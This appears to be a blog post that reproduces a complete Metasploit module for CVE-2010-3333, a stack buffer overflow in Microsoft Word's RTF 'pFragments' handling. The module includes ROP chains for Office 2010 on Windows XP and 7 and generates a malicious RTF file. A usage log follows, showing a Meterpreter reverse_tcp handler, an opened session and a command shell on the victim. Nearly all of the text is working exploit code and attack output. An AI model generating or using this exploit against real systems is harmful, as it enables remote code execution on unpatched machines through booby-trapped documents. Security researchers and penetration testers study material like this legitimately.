read, write, eXecute…

Microsoft Word RTF pFragments Stack Buffer Overflow Vulnerability download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
        Rank = GreatRanking

        include Msf::Exploit::FILEFORMAT

        def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)',
                        'Description'    => %q{
                                        This module exploits a stack-based buffer overflow in the handling of the
                                'pFragments' shape property within the Microsoft Word RTF parser. All versions
                                of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the
                                MS10-087 bulletin are vulnerable.

                                The Office 2010 windows 7 target requires that the victim has winword.exe open
                                for a few seconds before they open the file. The file still can be double clicked
                                if winword.exe has been opened for the said time.
                        },
                        'License'        => MSF_LICENSE,
                        'Author'         =>
                                [
                                        'wushi of team509',  # original discovery
                                        'unknown',           # exploit found in the wild
                                        'snake',             # public office 2010 poc
                                        'mr_me',             # msf
                                        'TecR0c'             # msf
                                ],
                        'Version'        => '$Revision: 12196 $',
                        'References'     =>
                                [
                                        [ 'CVE', '2010-3333' ],
                                        [ 'OSVDB', '69085' ],
                                        [ 'MSB', 'MS10-087' ],
                                        [ 'BID', '44652' ],
                                        [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=880' ],
                                        [ 'URL', 'http://www.exploit-db.com/exploits/17474/' ] #tx snake
                                ],
                        'DefaultOptions' =>
                                {
                                        'EXITFUNC' => 'process',
                                },
                        'Payload'        =>
                                {
                                        'Space'         => 512,
                                        'BadChars'      => "\x00",
                                        'DisableNops'   => true
                                },
                        'Platform'       => 'win',
                        'Targets'        =>
                                [

                                        # WINWORD.EXE v14.0.4762.1000
                                        [ 'Microsoft Office 2010 SP0 English on Windows XP SP3 English',
                                                {
                                                        'Ret' => 0x4384fc83 # pop eax; retn [gfx.dll].
                                                }
                                        ],

                                        # WINWORD.EXE v14.0.4762.1000
                                        [ 'Microsoft Office 2010 SP0 English on Windows 7 SP0 English',
                                                {
                                                        'Ret' => 0x3f39a603 # pop ecx; retn [MSGR3EN.DLL].
                                                }
                                        ],

                                ],
                        'DisclosureDate' => 'Nov 09 2010',
                        'DefaultTarget' => 0))

                register_options(
                        [
                                OptString.new('FILENAME', [ true, 'The file name.',  'msf.rtf']),
                        ], self.class)
        end

        def exploit

                # RTF property Array parameters
                el_size = sz_rand()
                el_count = sz_rand()

                if target.name =~ /on Windows 7 SP0 English/

                        # C:\Program Files\Microsoft Office\OFFICE14\PROOF\1033\MSGR3EN.DLL v3.1.0.15506
                        # loaded by default under windows 7 (not loaded at all under XP)
                        rop_gadgets =
                        [
                                0x3f101108,    # <- *&VirtualProtect()
                                0x3f389ca5,    # MOV EAX,DWORD PTR DS:[ECX] # RETN (MSGR3EN.DLL)
                                0x3f3094ef,    # XCHG EAX,ESI # RETN (MSGR3EN.DLL)
                                0x3f3a1602,    # POP EBP # RETN (MSGR3EN.DLL)
                                0x3f2c8964,    # ptr to 'jmp esp' (from MSGR3EN.DLL)
                                0x3f39d705,    # POP EAX # RETN (MSGR3EN.DLL)
                                0xfffffdff,    # value to negate, target value : 0x00000201, target reg : ebx
                                0x3f38e9b7,    # NEG EAX # RETN (MSGR3EN.DLL)
                                0x3f2e1725,    # XCHG EAX,EBX # RETN (MSGR3EN.DLL)
                                0x3f39a603,    # POP ECX # RETN (MSGR3EN.DLL)
                                0x3f3b0101,    # RW pointer (lpOldProtect) (-> ecx)
                                0x3f3967f3,    # POP EDI # RETN (MSGR3EN.DLL)
                                0x3f3967f4,    # ROP NOP (-> edi)
                                0x3f39d705,    # POP EAX # RETN (MSGR3EN.DLL)
                                0xffffffc0,    # value to negate, target value : 0x00000040, target reg : edx
                                0x3f38e9b7,    # NEG EAX # RETN (MSGR3EN.DLL)
                                0x3f2ef6bf,    # XCHG EAX,EDX # RETN (MSGR3EN.DLL)
                                0x3f39d705,    # POP EAX # RETN (MSGR3EN.DLL)
                                0x90909090,    # NOPS (-> eax)
                                0x3f2ca585,    # PUSHAD # RETN (MSGR3EN.DLL)
                        ].pack("V*")

                # C:\Program Files\Microsoft Office\Office14\GFX.DLL v14.0.4750.1000
                elsif target.name =~ /on Windows XP SP3 English/

                        rop_gadgets =
                        [
                                0x437a10c4,    # <- *&VirtualProtect()
                                0x43841201,    # MOV EAX,DWORD PTR DS:[EAX] # RETN (gfx.dll)
                                0x437b018b,    # XCHG EAX,ESI # RETN (gfx.dll)
                                0x438cc07d,    # POP EBP # RETN (gfx.dll)
                                0x4383189c,    # ptr to 'jmp esp' (from gfx.dll)
                                0x4384fc83,    # POP EAX # RETN (gfx.dll)
                                0xfffffdff,    # value to negate, target value : 0x00000201, target reg : ebx
                                0x43841430,    # NEG EAX # RETN (gfx.dll)
                                0x437b03bb,    # XCHG EAX,EBX # RETN (gfx.dll)
                                0x4390be09,    # POP ECX # RETN (gfx.dll)
                                0x43916001,    # RW pointer (lpOldProtect) (-> ecx)
                                0x4382d280,    # POP EDI # RETN (gfx.dll)
                                0x4382d281,    # ROP NOP (-> edi)
                                0x4384fc83,    # POP EAX # RETN (gfx.dll)
                                0xffffffc0,    # value to negate, target value : 0x00000040, target reg : edx
                                0x43841430,    # NEG EAX # RETN (gfx.dll)
                                0x438ebaea,    # XCHG EAX,EDX # INC EBX # RETN (gfx.dll)
                                0x4384fc83,    # POP EAX # RETN (gfx.dll)
                                0x90909090,    # NOPS (-> eax)
                                0x4382b783,    # PUSHAD # RETN (gfx.dll)
                        ].pack("V*")

                end

                data = ""
                # These words are presumably incorrectly used
                # assert(amount1 <= amount2)
                data << [0xffff].pack('v') * 2
                data << [0x05ff].pack('v')

                # eip overwrite
                rest = rand_text_alpha_upper(20)
                rest << [target.ret].pack("V*")
                rest << rand_text_alpha_upper(20)
                rest << rop_gadgets
                rest << make_nops(512-payload.encoded.length)
                rest << payload.encoded

                # Craft the array for the property value
                sploit = "%d;%d;" % [el_size, el_count]
                sploit << data.unpack('H*').first
                sploit << rest.unpack('H*').first
                sploit << "0"

                # must be using uppercase
                sploit[64, 40] = rand_text_alpha_upper(40)

                # Assemble it all into a nice RTF
                content  = "{\\rtf1"
                content << "{\\shp"             # shape
                content << "{\\sp"              # shape property
                content << "{\\sn pFragments}"  # property name
                content << "{\\sv #{sploit}}"   # property value
                content << "}"
                content << "}"
                content << "}"

                print_status("Creating '#{datastore['FILENAME']}' file ...")
                file_create(content)

        end

        def sz_rand
                bad_sizes = [ 0, 2, 4, 8 ]
                x = rand(9)
                while bad_sizes.include? x
                        x = rand(9)
                end
                x
        end
end
example usage
[mr_me@neptune CVE-2010-3333]$ msfconsole -r handle.rc


MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM



       =[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 772 exploits - 404 auxiliary - 118 post
+ -- --=[ 228 payloads - 27 encoders - 8 nops
       =[ svn r14294 updated yesterday (2011.11.21)

[*] Processing handle.rc for ERB directives.
resource (handle.rc)> use exploit/multi/handler
resource (handle.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (handle.rc)> set LHOST 192.168.114.1
LHOST => 192.168.114.1
resource (handle.rc)> set RHOST 192.168.114.130
RHOST => 192.168.114.130
resource (handle.rc)> set LPORT 4444
LPORT => 4444
resource (handle.rc)> exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.114.1:4444
[*] Starting the payload handler...
msf  exploit(handler) > [*] Sending stage (752128 bytes) to 192.168.114.1
[*] Meterpreter session 1 opened (192.168.114.1:4444 -> 192.168.114.1:43696) at 2011-11-23 10:31:27 +1100

msf  exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : MS10-083-PC
OS              : Windows 7 (Build 7600).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > shell
Process 832 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\ms10-083\Documents>whoami
whoami
ms10-083-pc\ms10-083

C:\Users\ms10-083\Documents>